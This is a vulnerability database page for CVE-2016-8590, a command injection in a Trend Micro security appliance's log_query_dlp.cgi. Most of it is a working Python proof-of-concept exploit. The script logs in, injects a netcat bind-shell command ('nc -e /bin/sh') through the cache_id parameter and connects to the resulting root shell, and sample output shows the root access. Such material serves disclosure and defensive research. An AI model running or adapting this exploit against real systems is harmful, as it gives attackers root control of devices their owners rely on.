Lucene search
RootSSV:92986HistoryApr 21, 2017 - 12:00 a.m.
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Command Injection Remote Code Execution Vulnerability (CVE-2016-8590)
2017-04-2100:00:00
Root
www.seebug.org
20
0.967 High
EPSS
Percentile
99.7%
Summary:
There exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.
Notes:
- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was
exec a bind shell using netcat. - Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts…
- Auth is now bypassed, please see CVE-2016-7552
Example:
saturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py
(+) usage: ./poc.py <target> <pass>
(+) eg: ./poc.py 172.16.175.123 admin123
saturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py 172.16.175.123 admin
(+) logged in...
(+) starting backdoor, this will take a few secs...
(+) calling backdoor!
id
uid=0(root) gid=0(root)
uname -a
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown
exit
import re
import os
import sys
import time
import requests
import threading
requests.packages.urllib3.disable_warnings()
if len(sys.argv) != 3:
print "(+) usage: %s <target> <pass>" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
p = sys.argv[2]
bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
e_url = "%scgi-bin/log_query_dlp.cgi" % bu
s = requests.Session()
def exec_bd(s, e_url):
# now we setup our backdoor
# no reverse, since it seems to fail !?
netcat = "test|`nc -e /bin/sh -lp 1337`"
e_url += "?act=search_advanced&cache_id=%s" % netcat
s.get(e_url, verify=False)
# first we login...
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
if "frame.cgi" in r.text:
print "(+) logged in..."
thread = threading.Thread(target=exec_bd, args=(s, e_url,))
thread.start()
print "(+) starting backdoor, this will take a few secs..."
time.sleep(4)
print "(+) calling backdoor!"
os.system("nc %s 1337" % t)
else:
print "(-) login failed"
sys.exit(-1)
Related
packetstorm
packetstorm
cve
cve
CVE-2016-8590
2017-04-28 19:59:00
CVE-2016-7552
2017-04-12 10:59:00
zdt
zdt
cvelist
cvelist
CVE-2016-8590
2017-04-28 19:00:00
CVE-2016-7552
2017-04-12 10:00:00
nvd
nvd
CVE-2016-8590
2017-04-28 19:59:00
CVE-2016-7552
2017-04-12 10:59:00
seebug
seebug
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability(CVE-2016-7552)
2017-04-21 00:00:00
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Command Injection Remote Code Execution Vulnerability (CVE-2016-8589)
2017-04-21 00:00:00
Trend Micro Threat Discovery Appliance remote code execution(CVE-2016-7547)
2017-04-12 00:00:00
checkpoint_advisories
checkpoint_advisories
Trendmicro Threat Discovery Appliance Directory Traversal (CVE-2016-7552)
2020-12-22 00:00:00
nuclei
nuclei
Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass
2021-02-23 21:19:32
prion
prion
Directory traversal
2017-04-12 10:59:00
Code injection
2017-04-28 19:59:00
metasploit
metasploit